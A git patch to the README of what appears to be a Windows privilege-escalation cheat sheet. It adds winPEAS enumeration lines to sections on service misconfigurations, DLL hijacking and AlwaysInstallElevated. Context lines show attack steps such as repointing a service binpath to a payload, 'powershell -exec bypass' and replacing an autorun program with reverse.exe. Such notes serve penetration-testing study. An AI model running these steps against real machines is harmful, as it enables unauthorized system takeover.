From d0baade54b3c9a5ba9790ff19150675dbdbd4816 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Sat, 3 Sep 2022 10:04:03 -0400 Subject: [PATCH] Update README.md --- README.md | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index 7d6f8b0..9a5e5e3 100644 --- a/README.md +++ b/README.md @@ -730,15 +730,13 @@ python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less ##### Services ```ps1 -# Enumeration -.\winPEASany.exe quiet servicesinfo - - - ######################################################################### #### 1. Insecure Service Properties ##################################### ######################################################################### +# Winpeas Enumeration +.\winPEASany.exe quiet servicesinfo + # Verify permissions of a service using accesschk .\accesschk.exe /accepteula -uwcqv user {SERVICE} @@ -754,11 +752,13 @@ config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\"" # Start a service: net start {SERVICE} - ######################################################################### ##### 2. Unquoted Service Path ########################################## ######################################################################### +# Winpeas Enumeration +.\winPEASany.exe quiet servicesinfo + # Verify permissions of to start service using accesschk .\accesschk.exe /accepteula -uwcqv user {SERVICE} @@ -777,6 +777,9 @@ net start {SERVICE} #### 3. Weak Registry Permissions ####################################### ######################################################################### +# Winpeas Enumeration +.\winPEASany.exe quiet servicesinfo + # Check regsvc for weak entries using powershell powershell -exec bypass @@ -802,6 +805,9 @@ net start regsvc ##### 4. Insecure Service Executables (File Permissions: Everyone) ###### ######################################################################### +# Winpeas Enumeration +.\winPEASany.exe quiet servicesinfo + # Verify permissions of a service using accesschk .\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe" @@ -818,6 +824,9 @@ net start filepermsvc #### 5. DLL Hijacking ################################################### ######################################################################### +# Winpeas Enumeration +.\winPEASany.exe quiet servicesinfo + # Verify permissions of to start service using accesschk .\accesschk.exe /accepteula -uvqc dllsvc @@ -873,7 +882,6 @@ copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" #### 2. AlwaysInstallElevated ########################################### ######################################################################### - # Winpeas Enumeration to see if both registry values are set .\winPEASany.exe quiet windowscreds